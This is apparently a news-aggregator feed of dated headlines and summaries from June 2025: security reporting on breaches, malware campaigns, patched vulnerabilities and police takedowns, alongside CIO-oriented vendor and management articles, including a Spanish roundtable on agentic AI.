at the project level, and to have discussions that are not scripted or focused on an agenda.” Adding this layer of cadenced check-in to an already busy schedule can feel like a burden. But it is worth the effort. “Effective communication improves culture,” says Velamoor. “When you improve the culture and the collaboration, it provides a lot of dividends to both you and your customers.”

https://www.cio.com/article/4002139/8-communication-strategy-tips-for-it-leaders.html
Blitz Malware: A Tale of Game Cheats and Code Repositories
2025-06-06T10:00:49Z | 1749204049

Blitz malware, active since 2024 and updated in 2025, was spread via game cheats. We discuss its infection vector and abuse of Hugging Face for C2. The post Blitz Malware: A Tale of Game Cheats and Code Repositories appeared first on Unit 42.

https://unit42.paloaltonetworks.com/blitz-malware-2025/
STC Kuwait Allegedly Breached, Sensitive Employee Data For Sale Online
2025-06-06T10:00:42Z | 1749204042

STC Kuwait, a major telecommunications provider in the country, has allegedly suffered a significant data breach. A threat actor has posted on a dark web forum claiming to be in possession of sensitive personal information belonging to over 300 employees of the company. STC Kuwait, a subsidiary of the stc Group, is a key player […]

https://dailydarkweb.net/stc-kuwait-allegedly-breached-sensitive-employee-data-for-sale-online/
Analysis of the latest Mirai wave exploiting TBK DVR devices with CVE-2024-3721
2025-06-06T10:00:38Z | 1749204038

Kaspersky GReAT experts describe the new features of a Mirai variant: the latest botnet infections target TBK DVR devices with CVE-2024-3721.

https://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/
BBVA Technology’s purpose to put people first
2025-06-06T10:00:00Z | 1749204000

In the dynamic global context of battling for IT talent, where ​​in Spain alone new estimates from DigitalES show there are up to 120,000 unfilled positions, BBVA Technology has made the problem its main strength. Since last year, the digital bank has grown its employee base by around 30% across its offices in Madrid, Bilbao, and Barcelona. And following the recent completion to integrate its three technology companies — Next Technologies, IT España and Datio — it’s now fortified with the in-house talent that can maximize software development and tech skills. “We needed an attractive brand to serve as a foundation for the growth we’ve experienced in our workforce,” says CEO Ricardo Jurado. But while the merger process wasn’t easy, it was essential to build consistent processes and culture. “We also suffered from the skills gap,” he adds, but the key to addressing it was having an attractive value proposition for employees and potential recruits, while improving employment metrics for underrepresented groups. Recipe for success Jurado details a team composed of approximately 50% developers, 15% technical architects, and a deep bench of different types of data, systems, and security engineers. “We have reason to be proud because we’ve grown and we’ve done so with quality,” he says. Compared to how things were structured before, with three separate tech companies, the current consolidated BBVA Technology focuses on the bank itself without having to provide external services to the market. “Our employees are involved in the technological foundation of any project the bank has,” he says. Above all, the company’s most visible, and most competitive, feature is the app, due to its operational efficiency and mobile capabilities. And a recent updated version of it powered by AI marks a turning point in digital banking, Jurado says, with a firm commitment on improved user experience, from a financial coach and personalized savings plans, to more intuitive and simple ways to make payments. The paradigm of AI When applied to BBVA Technology’s operations and its talent, Jurado sees AI use in everything related to staff retention and attraction. “We’ve adjusted our training offering with new content almost immediately,” he says. “In this sense, we believe it’ll help us detect knowledge gaps and propose customized paths for each person.” Steady progress is essential, though, without getting overwhelmed with tools that might not be practical. Bottom line is progress has to be compatible with concepts of the business plan, such as security, ethics, and responsibility. It’s important to stay grounded with AI, and be confident it won’t replace software developers, but rather empower BBVA’s entire global software development unit, which identifies best practices and guarantees productivity. “From Spain, we’ve been driving many of these, such as agile methodologies or DevOps,” he says. “AI is just another addition to all of this.” After all, Jurado sees all technology as an enabler. For the past decade, he says, the bank has thrived with digitalization. “I think the turning point was when we realized digital transformation for the business is always ongoing,” he says. “This is a long-distance race.”

https://www.cio.com/article/4002600/ricardo-jurado-bbva-technology-our-employees-participate-in-the-technological-base-of-any-project-of-the-bank.html
Cisco Patches Critical ISE Vulnerability With Public PoC
2025-06-06T09:47:21Z | 1749203241

Cisco has released patches for a critical vulnerability impacting cloud deployments of Identity Services Engine (ISE). The post Cisco Patches Critical ISE Vulnerability With Public PoC appeared first on SecurityWeek.

https://www.securityweek.com/cisco-patches-critical-ise-vulnerability-with-public-poc/
MoSeeker Allegedly Hit by Massive Data Breach, 40 Million Records for Sale Online
2025-06-06T09:43:32Z | 1749203012

The Chinese AI-powered recruiting platform, MoSeeker, has allegedly been compromised, with a threat actor claiming to sell a full database dump containing 40 million records for $1200. The sale was announced on a dark web forum, putting the sensitive information of millions of job seekers and companies at risk. MoSeeker, based in Shanghai, is a […]

https://dailydarkweb.net/moseeker-allegedly-hit-by-massive-data-breach-40-million-records-for-sale-online/
Tata Communications’ digital fabric enables hyperconnected ecosystems
2025-06-06T09:37:49Z | 1749202669

The business landscape has undergone a dramatic shift in recent years.  Ecosystems have become highly complex and interconnected, with value chains becoming increasingly non-linear. This hyperconnectivity demands seamless collaboration and real-time communication across a vast network of employees, partners, suppliers, and customers.  Businesses need to rethink their digital strategies to ensure a frictionless experience for all stakeholders within their ecosystem. However, delivering this frictionless experience is not easy, as CIOs face the challenges of integrating and managing a complex array of technologies, often with a mix of legacy tools and infrastructure. Tata Communications’ Digital Fabric aims to address these challenges by offering a unified platform that simplifies management, enhances visibility, and provides a secure foundation for building hyperconnected ecosystems. It includes infrastructure, platform, and tools brought together through an orchestration layer to enable better visibility, control, and manageability across the IT landscape. Organisations can expect: Improved experiences – Seamless interactions between employees, customers, partners, and other stakeholders. Reduced complexity – Integration of disparate tools and systems for easier management. Enhanced security – A secure-by-design approach to protect your digital infrastructure. Scalability – Designed to adapt and grow as your business needs evolve. Digital Fabric has several components, including network fabric, cloud fabric, interaction fabric, and Internet of Things fabric, which are all secure by design and bolstered by our end-to-end managed services. The building blocks of the future of network Enterprises are adopting modern applications and moving away from monolithic ones. On the other hand, traditional network and security architectures are perimeter-bound and cannot cope with network infrastructure and security demands. This limits the effectiveness of modern applications, hybrid cloud adoption, and hybrid working productivity. Additionally, network and security continue to be organisational silos with teams managing separate KPIs and priorities, making it challenging to take on IT modernisation and convergence projects. Tata Communications’ Network Fabric provides a right-fit, resilient, and programmable network with global reach to cater to future needs. It includes global network infrastructure made programmable through on-demand capabilities, managed LAN and WAN solutions such as managed Wi-Fi, SD-WAN, and integrated network and security through our managed SASE offering.  This portfolio consists of the following domains: Contextual Wi-Fi and LANTata Communications’ Managed Services is a one-stop solution for Wi-Fi and LAN implementation and management. It offers the best-fit solution, including site survey, consulting, technology OEM selection, network configuration, deployment, and lifecycle maintenance. It helps with wireless devices, users, and access permission management, as well as location-specific analytics to support business growth. Predictable and programmable hybrid WANTata Communications’ programmable and performant network provides operational visibility, simplified management, and greater dependability. The offerings include Private Lines and Internet Access Services for core connectivity requirements. It also features IZO™ Internet WAN, the world’s first end-to-end predictable internet for business, offering consistent performance, high availability internet services with dedicated, broadband, 4G/5G, LEO Satellite internet access in over 150 countries. Software-defined multi-cloud connectivityThe cloud connectivity solution IZO™ Multi Cloud Connect provides high-speed, on-demand, pay-as-you-go software-defined cloud interconnect (SDCI) with configurable virtual network Functions (VNFs). It is an API-enabled agile platform with comprehensive traffic reporting and analytics. Intelligent overlay through managed SASETata Communications’ Managed SASE (Secure Access Service Edge) represents the convergence of networking and security. It brings together the modern networking architecture of SD-WAN with security service edge, firewall-as-a-service, zero trust network access, secure web gateway, and cloud access security broker. It also provides a single-pass architecture that secures private apps, users, and internet traffic from web, cloud, and network-based threats. Future-proof your network with comprehensive NaaS solutions To address enterprise network needs, Tata Communications’ Network-as-a-Service (NaaS) solutions are multi-domain, offering full end-to-end NaaS coverage of on-premises network, underlay WAN, cloud-delivered security, and multi-cloud connectivity. It is designed to meet changing market requirements effortlessly by scaling underlying networks in minutes, as well as ensure consistent security policy regardless of user and endpoint locations with a pay-per-use model. Self-service portals further enable users to spin up new resources and network bandwidth within minutes. By removing the need to overprovision cloud connectivity for site-to-cloud, cloud-to-cloud, and cloud-to-SaaS use cases, enterprises can reduce cloud egress costs and enjoy OPEX savings. At a glance, Tata Communications offers: SD-WAN-as-a-Service that simplifies the SD-WAN offering with a cloud-like consumption model Core Network On-Demand, featuring zero-based bandwidth with connectivity activated in minutes WI-Fi & LAN-as-a-Service with no minimum commitment, zero obsolescence, and zero technical debt Monitoring-as-a-Service that enables faster fault identification with proactive 24/7 real-time monitoring Hosted SASE with a single-pass architecture for end-to-end visibility and context-led insights These solutions have empowered enterprises across various industries. An example is Hager Group. The German manufacturer of electric installation systems enjoyed the benefits of a global cloud-ready network, resulting in a better user experience after Tata Communications helped transform its network that connects over 80 locations with Managed SD-WAN and IZO™ WAN. Antonio Gelardi, Senior Manager, Network and Security, Hager Group, cited significant improvements in productivity and user experience. Find out more about Tata Communications’ Secure Network Transformation and Network-as-a-Service offerings.

https://www.cio.com/article/4002970/tata-communications-digital-fabric-enables-hyperconnected-ecosystems.html
South Korean Mobile Coupon Giant Zlgoon Allegedly Breached; 1.1 Million Customer Records for Sale Online
2025-06-06T09:24:08Z | 1749201848

Zlgoon Inc., a prominent Online-to-Offline (O2O) company in South Korea, has allegedly suffered a significant data breach. The company, known as a leading provider of mobile coupons for the popular messaging app KakaoTalk, is at the center of a security incident after a threat actor advertised a database containing the records of 1.1 million customers […]

https://dailydarkweb.net/south-korean-mobile-coupon-giant-zlgoon-allegedly-breached-1-1-million-customer-records-for-sale-online/
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 22/2025
2025-06-06T09:17:18Z | 1749201438

This week, we turn our attention to the approaching holiday season. Scammers don’t take holidays. On the contrary, they increasingly target acting financial officers with CEO fraud schemes while the regular staff are away. We also highlight growing cooperation in the field of cybersecurity and introduce new legislation aimed at improving the security of wireless devices.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-222025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) - 22/2025
2025-06-06T09:17:18Z | 1749201438

This week, we turn our attention to the approaching holiday season. Scammers don’t take holidays. On the contrary, they increasingly target acting financial officers with CEO fraud schemes while the regular staff are away. We also highlight growing cooperation in the field of cybersecurity and introduce new legislation aimed at improving the security of wireless devices.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-222025
La IA agentiva y el pensamiento crítico: cómo pasar del dato a la decisión autónoma impulsando los negocios
2025-06-06T09:06:09Z | 1749200769

El impacto del auge de los agentes de IA, a tenor de lo relatado por los asistentes al debate, realizado el pasado 3 de junio en Madrid y moderado por Esther Macías, directora editorial de CIO ESPAÑA, no se va a hacer esperar en nuestro país. Desde un agente multiconversacional capaz de vender un coche desde la web al usuario final hasta aquellos que ayudan a los médicos a analizar imágenes, los responsables tecnológicos de distintas organizaciones fueron desgranando los casos de uso que sus empresas ya han puesto en marcha o esperan arrancar en los próximos meses.  Algunas de ellas emplean los agentes en procesos de back-office, otras automatizan procesos en las aduanas, y otras buscan servirse de esta tecnología para atender las demandas de estudiantes, que buscan profesores disponibles 24 horas para resolver sus dudas antes de los exámenes. No en vano, la inteligencia artificial agentiva propone introducir sistemas altamente automatizados capaces de percibir información, tomar decisiones y actuar con mínima intervención humana.  Sin embargo, todo esto no es posible si no aseguramos la calidad y el control del dato. “La IA agentiva es la punta del iceberg. Para construir algo positivo tenemos que basarnos en algo sólido”, explicó Sergio Rodríguez, director de tecnología de Puedata, consultora especializada en proyectos de datos e IA. Para este experto, la clave para una mayor adopción de esta tecnología residirá en encontrar casos de uso que no se puedan resolver de forma tradicional. Su compañera Lucía Ferrer, directora comercial de la compañía, explicó que su compañía atraviesa un “momento dulce” ante el aumento de la demanda de proyectos de datos, algo en lo que la firma lleva trabajando diez años. “Hoy algunos CEO piden hablar con los datos en tiempo real en lenguaje natural”, explicó.  Juan Márquez | Foundry. En la imagen, Sergio Rodríguez de Guzmán (Puedata). No obstante, remarcó la importancia de trabajar con datos de calidad para que los modelos sean operativos. “Los proyectos de IA tienen una tasa de abandono muy alta porque el usuario se cansa. Si el modelo responde mal, lo abandonas”, añadió.  Patricia Novo, ejecutiva de cuentas en Databricks, explicó que su compañía, pionera en el concepto ‘lakehouse’, se enfoca en desarrollar casos de uso en un momento donde la IA agentiva está lista para escalar. “Invertimos mucho en los asistentes para que los usuarios puedan interactuar en lenguaje natural”, aseveró. “Un sistema agentivo son inteligencias artificiales pilotadas por un máster. Hay que evaluar cómo funciona, hay que ponerles jueces y esos jueces son otra IA. El reto es cómo evaluar ese sistema”, añadió.  Retos: talento, velocidad y miedo al cambio  El encuentro también abordó los principales retos a los que debe hacer frente una organización para implantar agentes de IA. Para Ubaldo González, CDO (director de datos) de Mapfre España, el principal de ellos es el talento. “Hacemos un esfuerzo sobrehumano por atraerlo y retenerlo, pero es que además os encontramos resistencia al cambio incluso en el propio talento”, aseveró. “Con la IAG somos capaces de hacer el trabajo tres veces más rápido, pero los programadores tradicionales están viendo una amenaza en ella”, explicó.  Un reto que se extiende también al ámbito académico. Luis Miguel Garay, director de Ciencias de la Computación y Tecnología de la Universidad Internacional de La Rioja (UNIR), explicó que los alumnos buscan profesores con experiencia en esta materia, algo difícil de encontrar. “Hay que gestionar la ansiedad que genera la IA en los CEO, pero también en los alumnos”, afirmó.  Juan Márquez | Foundry. En la imagen, Patricia Novo (Databricks). Otro reto es la velocidad a la que desarrolla esta tecnología, que complica su adopción para algunas organizaciones. “Si te metes a hacer personalizaciones de agentes, has perdido el tren, y la inversión”, apuntó Marta Salas, directora de IA en la Universidad Francisco de Vitoria.  “Cuando la educación va más rápido que la tecnología, se genera prosperidad. Cuando es al revés se genera sufrimiento”, dijo Antonio Serrano, coordinador de digitalización e innovación de la Universidad Rey Juan Carlos I. El académico, también abogado y empresario, explicó que la correcta implantación de la inteligencia artificial agentiva para necesariamente por cuatro “es”: esfuerzo, excelencia, ética y educación.  Otro reto apuntado por los asistentes es combinar las altas expectativas generadas por la IA agentiva en los comités de dirección con la fría acogida por parte de algunos empleados. “El reto no es convencer a la alta dirección, sino más bien frenarlos, porque cuando llega al resto de la organización y tiene que cambiar su forma de trabajar no es tan fácil implicarlos”, sostuvo Carlos Garriga, CIO de IE University.  “Todo el mundo quiere probar, darle al botón. El negocio pide magia, pero para eso es necesario tener inteligencia de la buena. Si los datos no tienen calidad es difícil sacarle partido a la IA”, dijo Cristina Cid, subdirectora de Transformación Tecnológica de Correos, quien coincidió también en apuntar a la velocidad de esta tecnología como uno de los principales obstáculos para su implantación.  Juan Márquez | Foundry Pensamiento crítico: la clave para gobernar la IA generativa  En lo que todos los asistentes coincidieron fue en la importancia del pensamiento crítico para gobernar la inteligencia artificial generativa. “Hay que saber ser crítico con lo que la IA generativa te ofrece. El humano todavía es extremadamente necesario. Si no eres crítico, esta tecnología puede ser insostenible”, dijo Sergio Rodríguez, CTO de PueData.  “La realidad es que nos creemos directamente lo que sale de la IA generativa. Está diseñada para ello”, dijo Marta Salas, quien reveló que un estudio de Microsoft demuestra que un porcentaje muy alto de la población da por buenos los resultados que saca Copilot sin hacer posteriores comprobaciones. “Hay que transformar los interfaces para que nos ayuden a tener pensamiento crítico”, subrayó.   Mariano Ventosa, vicerrector de Profesorado, Investigación e IA de la Universidad Pontificia de Comillas, expresó también por su preocupación antes los costes que puede tener la IA agentiva en un escenario donde los precios suban si hay pocos proveedores. Un aspecto que, sin embargo no preocupa a Patricia Novo. “Hemos visto a los hiperescalares preocuparse por la energía que necesitaban los data centers y al final DeepSeek ha demostrado que no hace falta tanta energía. Mi sensación es que la IA se va a hacer más eficiente. Hay un movimiento open source muy fuerte y Databricks aboga por ello”, afirmó.  Para Jesús Domínguez, arquitecto empresarial principal de Roche, el principal reto está en la integración de los datos, mientras que para Sergio López Salazar, responsable de la oficina tecnológica de proyectos de Lefebvre, está en convencer a mucha gente del valor de la IA generativa. “Tenemos que gestionar las expectativas del Comité de Dirección”, añadió Joaquín Corral, director global del servicio de sistemas de TI de Avolta.  En suma, distintos retos para afrontar un salto que ya parece inevitable. Del dato a la decisión autónoma de la mano de la IA agentiva, una tecnología que permitirá acercarnos al futuro el futuro optimizando operaciones si somos capaces de resolver con eficiencia los retos que aún presenta en 2025.

https://www.cio.com/article/4002913/la-ia-agentiva-y-el-pensamiento-critico-como-pasar-del-dato-a-la-decision-autonoma-impulsando-los-negocios.html
He Hacked Servers, Not People — But Still Left a $4.5 Million Mess Behind
2025-06-06T09:03:43Z | 1749200623

For years, he stayed under the radar. No ransomware, no flashy data leaks, no digital fingerprints loud enough to cause alarm. Just a quiet tapping of server power, thousands of machines working overtime, all without their owners knowing. Now, that silence has been broken. Cyber police in Ukraine’s Zaporizhzhia region say they have exposed a 35-year-old man from Poltava behind a cryptocurrency mining scheme that compromised over 5,000 customer accounts of a major international hosting provider. His goal wasn’t to steal data. It was to steal computing power, and he did it well. Authorities say the operation caused more than $4.5 million in losses and involved a web of forged credentials, remote-access tools, crypto wallets, and hacked virtual machines quietly mining digital currency across servers that didn’t belong to him. A Long Game, Played Quietly This wasn’t a smash-and-grab. It was slow, careful, and calculated. According to Ukraine’s Cyber Police Department, the suspect had been collecting intelligence since 2018, scanning the internet for exposed systems, unpatched servers, and any hint of weakness that could be exploited. When he found one, he’d move in quietly, no warnings triggered, no obvious breach. Eventually, he found a goldmine, a hosting company with global reach. The firm isn’t being named, but investigators say its services powered thousands of websites, apps, and digital platforms. More importantly, it provided rented server space to customers, space the hacker would soon make his own. Virtual Machines, Real Money With access to over 5,000 customer accounts, the man started deploying unauthorized virtual machines, digital computers within computers, on those servers. These machines were programmed for one thing: mining cryptocurrency. On paper, it’s not the kind of cybercrime that makes headlines. No one’s identity was sold, no ransomware splash screen popped up. But behind the scenes, the servers were working overtime, burning electricity and resources for a criminal’s payday. By the time investigators caught on, the damage was done. The hosting company reported losses nearing $4.5 million, money lost to unauthorized computing, bandwidth strain, and inflated infrastructure costs. And while the victims were companies, not individuals, the scale and stealth of the crime drew international attention. Zaporizhzhia Cyber Police Takedown The takedown wasn’t easy. The suspect didn’t stay in one place. He moved around between Poltava, Odessa, Dnipro, and Zaporizhzhia, regions across Ukraine, making it harder to trace him. But eventually, police locked in. With support from Europol and the Department of International Police Cooperation, cyber police raided multiple locations tied to the suspect. What they found confirmed everything. Among the evidence seized: Computer equipment used for mining and remote access Phones and bank cards linked to crypto transactions Email credentials are used to compromise accounts Custom mining scripts and hacker tools Crypto wallets holding proceeds from the illegal mining Investigators also found active profiles on underground forums where the man had engaged in cybercrime discussions, bought tools, and likely sold access or services. What Happens Next The suspect is now facing serious charges under Part 5 of Article 361 of Ukraine’s criminal code — unauthorized interference in information systems. If convicted, he could face up to 15 years in prison, along with a ban on working in tech-related roles for at least three years. The pre-trial investigation is still ongoing, and authorities say more charges could follow depending on what additional digital evidence reveals. Conclusion Cryptojacking, the act of hijacking machines to mine crypto, often flies under the radar. It doesn’t trigger panic like a data breach, and victims often don’t even realize it’s happening. But as this case shows, the impact is real, the losses are massive, and the technology is increasingly easy to abuse. This incident also highlights a truth: cybercrime doesn’t always come with drama. Sometimes, it’s just one man with a laptop, patience, and access. And sometimes, that’s all it takes.

https://thecyberexpress.com/zaporizhzhia-cyber-police-arrest-crypto-hacker/
Innovation, Not Infrastructure: Akamai?s Managed Cloud Services
2025-06-06T09:00:00Z | 1749200400

https://www.akamai.com/blog/cloud/2025/jun/innovation-infrastructure-akamai-managed-service-compute
Police arrests 20 suspects for distributing child sexual abuse content
2025-06-06T08:55:21Z | 1749200121

Law enforcement authorities from over a dozen countries have arrested 20 suspects in an international operation targeting the production and distribution of child sexual abuse material.

https://www.bleepingcomputer.com/news/security/police-arrests-20-suspects-for-distributing-child-sexual-abuse-content/
HPE Patches Critical Vulnerability in StoreOnce
2025-06-06T08:52:10Z | 1749199930

An HPE StoreOnce vulnerability allows attackers to bypass authentication, potentially leading to remote code execution. The post HPE Patches Critical Vulnerability in StoreOnce appeared first on SecurityWeek.

https://www.securityweek.com/hpe-patches-critical-vulnerability-in-storeonce/
US Offering $10 Million Reward for RedLine Malware Developer
2025-06-06T08:37:08Z | 1749199028

A reward is being offered for Maxim Alexandrovich Rudometov, who is accused of developing and managing the RedLine malware. The post US Offering $10 Million Reward for RedLine Malware Developer appeared first on SecurityWeek.

https://www.securityweek.com/us-offering-10-million-reward-for-redline-malware-developer/
New PathWiper Data Wiper Malware Disrupts Ukrainian Critical Infrastructure in 2025 Attack
2025-06-06T08:35:00Z | 1749198900

A critical infrastructure entity within Ukraine was targeted by a previously unseen data wiper malware named PathWiper, according to new findings from Cisco Talos. "The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across...

https://thehackernews.com/2025/06/new-pathwiper-data-wiper-malware.html
BADBOX 2.0 Malware Hits Over a Million Android Devices in Global Cyber Threat
2025-06-06T08:10:00Z | 1749197400

HUMAN’s Satori Threat Intelligence and Research team, in collaboration with Google, Trend Micro, and Shadowserver, has uncovered and partially disrupted a massive cyber fraud operation named BADBOX 2.0. This operation, an evolved iteration of the original BADBOX malware disclosed in 2023, has infected over 1 million Android Open Source Project (AOSP) devices worldwide, marking it […] The post BADBOX 2.0 Malware Hits Over a Million Android Devices in Global Cyber Threat appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/badbox-2-0-malware-hits-over-a-million-android-devices/
Paste.ee Turned Cyber Weapon: XWorm and AsyncRAT Delivered by Malicious Actors
2025-06-06T07:42:20Z | 1749195740

The widespread text-sharing website Paste.ee has been used as a weapon by bad actors to spread powerful malware strains like XWorm and AsyncRAT, which is a worrying trend for cybersecurity professional. This tactic represents a significant shift in phishing and malware delivery strategies, exploiting a trusted service to bypass traditional security defenses. Unveiling a New […] The post Paste.ee Turned Cyber Weapon: XWorm and AsyncRAT Delivered by Malicious Actors appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/paste-ee-turned-cyber-weapon/
$17 Million Black Market Empire Crushed in Cybercrime Sting
2025-06-06T07:37:14Z | 1749195434

The U.S. government has seized approximately 145 domains associated with the BidenCash marketplace and other criminal marketplaces, effectively dismantling one of the most notorious darknet operations for trafficking stolen credit card data and personal information.  Announced by the U.S. Attorney’s Office for the Eastern District of Virginia, this sweeping operation targeted both darknet and surface web domains. According to court records, the U.S. also obtained authorization to seize cryptocurrency wallets used by BidenCash to process illicit payments, further choking off the revenue stream that sustained its criminal operations.  BidenCash Marketplace: A Hub for Cybercrime  Launched in March 2022, the BidenCash marketplace quickly gained notoriety in the criminal underworld. Operating as a one-stop shop for stolen financial data, the marketplace offered credit card numbers, expiration dates, CVV codes, and even personal identification details such as names, addresses, phone numbers, and emails. For each transaction facilitated on the site, BidenCash administrators collected a fee.  Over time, the platform grew to serve more than 117,000 users and facilitated the trafficking of over 15 million payment card records. In just under two years, it generated over $17 million in revenue.  To boost their visibility and expand their user base, BidenCash operators engaged in marketing strategies more often seen in legitimate businesses, such as promotional giveaways. Between October 2022 and February 2023, they released 3.3 million stolen credit card records for free, hoping to attract more buyers to their services.  The BidenCash marketplace wasn't limited to payment card data. It also offered stolen credentials to access computers, effectively enabling a range of unauthorized and potentially destructive cyber intrusions.  Beyond BidenCash: Ongoing Crackdown on Cybercrime Syndicates  This isn’t the first time federal authorities have disrupted cybercrime infrastructures. In a related case, the Department of Justice previously seized four domains tied to a crypting service—a software-based method for concealing malware from antivirus detection. These crypting and counter-antivirus (CAV) services allowed cybercriminals to deploy more advanced and undetectable malicious software, often linked to ransomware attacks.  According to an affidavit, undercover agents made purchases from the seized sites and traced connections to known ransomware groups operating in the U.S. and abroad, including in Houston. “Modern criminal threats require modern law enforcement solutions,” said U.S. Attorney Nicholas J. Ganjei. “This investigation struck at the infrastructure enabling cybercriminals, not just the end users.”  FBI Houston Special Agent in Charge Douglas Williams echoed the sentiment: “Cybercriminals don’t just create malware; they perfect it for maximum destruction.”  Operation Endgame: A Global Effort  These seizures were part of Operation Endgame, a multi-national law enforcement initiative focused on dismantling malware and cybercriminal services worldwide. On May 27, coordinated actions by U.S., Dutch, Finnish, German, French, and Danish authorities led to the takedown of several domain infrastructures supporting criminal activity.  The FBI Houston Field Office, along with the U.S. Secret Service and international partners, played a pivotal role in this effort. Assistant U.S. Attorneys Shirin Hakimzadeh and Rodolfo Ramirez are leading the prosecution, with AUSA Kristine Rollinson overseeing the seizures.  Earlier in May, another operation saw the seizure of nine DDoS-for-hire sites, commonly known as booter or stresser services. These services allow paying users to launch Distributed Denial-of-Service (DDoS) attacks, disrupting internet access for individuals, schools, government agencies, and gaming platforms.  The FBI and Poland’s Central Cybercrime Bureau, which arrested four site administrators, discovered that these sites had facilitated hundreds of thousands of DDoS attacks globally. While the services claimed to be for “network testing,” evidence showed they were routinely used to attack third-party systems.  Assistant U.S. Attorney Bill Essayli for the Central District of California stated, “Booter services facilitate cyberattacks that harm victims and compromise everyone’s ability to access the internet.”

https://thecyberexpress.com/bidencash-marketplace-domains-seized/
Tata Communications recognised as a Leader in the 2025 Gartner® Magic Quadrant™ for Global WAN Services for 12 consecutive years
2025-06-06T07:31:31Z | 1749195091

What does it take to be a leader and recognised year on year? In short, it is a testament to customer trust, of continued innovation and leadership in delivering future-ready network solutions. For any company to be successful, it is vital to have a clear vision of the company’s roadmap, which provides strategic direction and focus. It ensures employees and all stakeholders understand the company’s goals, and paves the way for better decision-making. To be recognised as a leader repeatedly surely speaks volumes about a company’s vision, strengths, and the ability to help enterprises succeed in a hyperconnected environment. Trust as the foundation to digital success Trust underpins all forms of economic activity and forms the foundation of our society. Trust has always been built through interpersonal relationships over time. An IDC report commissioned by Tata Communications notes that “Building trust and being trusted in the digital realm are not options. If you are not trusted online, you will not be able to transact online”. In today’s digital realm, organisations must give their stakeholders the confidence that they have the necessary measures to secure any transaction they conduct. Trust drives businesses, and digital trust drives digital businesses. 12 reasons to trust Tata Communications as a leader for global WAN services Why are we the trusted partner for enterprises to help them succeed in a digital-first world, for 12 consecutive years? Here are 12 reasons why: We run the world’s largest wholly owned subsea cable network.  Together with our strategic investments in other cable systems, we operate 500,000+ km of subsea optical fibre. Enterprises can achieve their global ambition with borderless growth. We operate a global Tier-1 IP network, with customers accounting for over one-third of the world’s internet routes.  Our internet edge capacity reaches 250 Tbps. Enterprises can have shorter paths with more resilient and secure internet connections, augmented by native threat intelligence and DDoS. Our IZO™ Internet WAN is the world’s first predictable internet services with guaranteed performance. It evolves to encompass different service variants including broadband internet, 4G/5G and satellite access, spanning across 150+ countries. Enterprises global access needs can be met with comprehensive, best fit solutions. We support a software-defined cloud interconnect service, IZO™ Multi Cloud Connect, with a 100% availability SLA, connecting the global cloud giants. Enterprise cloud connectivity can be simple and agile to satisfy changing needs. Our Network-as-a-Service (NaaS) comes with comprehensive options and zero-based bandwidth on a pay-as-you-go model. It can scale up to 100 Gbps and cover Private Line, MPLS, VPN, and internet services. Enterprises have a flexible consumption model for core network connectivity. We provide SDWAN-as-a-Service (SDWANaaS) and Wi-Fi-as-a-Service (WiFiaaS) with a “cloud-like” consumption model. Enterprises can avoid technical debt and have a faster provisioning lead time. We support Hosted SASE, which runs single vendor technology over our global network to offer a single-pass security advantage. We also have Hybrid SASE, which combines multi-vendor SDWAN and SSE. With 3.5TB of data analysed daily, 8K+ IOCs detected and blocked, and native SOAR enhancing MTTD and MTTR by 99%, we deliver cutting-edge network protection. Enterprise network and security needs can also be integrated with a single dashboard and management panel. We enable virtual network functions (VNFs), both at the gateway and cloud edge locations, as well as on premises as universal CPE. Enterprises do not need to invest in single integrated devices that lack flexibility and have longer delivery lead times. We maintain 99.8% first-time right deployments of SDWAN managed services and Security Service Edge, and over 95% of incidents are proactively identified by our management platform. Enterprises can be assured of smooth service migration with shorter incident resolution times. We offer simple, intelligent Managed Wi-Fi & LAN with multiple vendors and service packages. Enterprises’ end user experience is improved with better coverage, easier guest access, and the usage analytics required by business growth. Our unique AXIOM managed services framework, which focuses on “Assess, eXecute, Integrate, Operate & Manage”, takes care of the entire management lifecycle across Day 0, Day 1, and Day 2, augmented by value-added services. Enterprises can ensure that their network management staff focus on their core business. Our TCX platform helps manage the network with greater visibility, control, and ease. Enterprises can manage the entire lifecycle from design, delivery, and operations from a single pane of glass. Find out more about Tata Communications’ network solutions here.

https://www.cio.com/article/4002884/tata-communications-recognised-as-a-leader-in-the-2025-gartner-magic-quadrant-for-global-wan-services-for-12-consecutive-years.html
Play ransomware group hit 900 organizations since 2022
2025-06-06T07:22:22Z | 1749194542

A joint advisory from the US and Australian authorities states that Play ransomware has hit approximately 900 organizations over the past three years. A joint advisory from the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) states that Play ransomware has hit […]

https://securityaffairs.com/178702/cyber-crime/play-ransomware-group-hit-900-organizations-since-2022.html
PoC Exploit Released for Apache Tomcat DoS Vulnerability
2025-06-06T07:10:17Z | 1749193817

A critical memory leak vulnerability in Apache Tomcat’s HTTP/2 implementation (CVE-2025-31650) has been weaponized, enabling unauthenticated denial-of-service attacks through malformed priority headers. The flaw affects Tomcat versions 9.0.76–9.0.102, 10.1.10–10.1.39, and 11.0.0-M2–11.0.5, with public exploits already circulating 12. Vulnerability Mechanics and Attack Vector According to the report, the vulnerability stems from the improper cleanup of failed […] The post PoC Exploit Released for Apache Tomcat DoS Vulnerability appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

https://gbhackers.com/apache-tomcat-dos-vulnerability/
Eesti äppi saab peagi kasutada isiku tõendamiseks
2025-06-06T07:07:15Z | 1749193635

Riigikogu kiitis 4. juunil 75 poolthäälega heaks seaduseelnõu, mis võimaldab inimestel kasutada Eesti riigiäppi oma isiku tõendamiseks. Uus lahendus muutub kasutatavaks juulis.

https://ria.ee/uudised/eesti-appi-saab-peagi-kasutada-isiku-toendamiseks
Don’t give hacktivists what they really want
2025-06-06T07:00:00Z | 1749193200

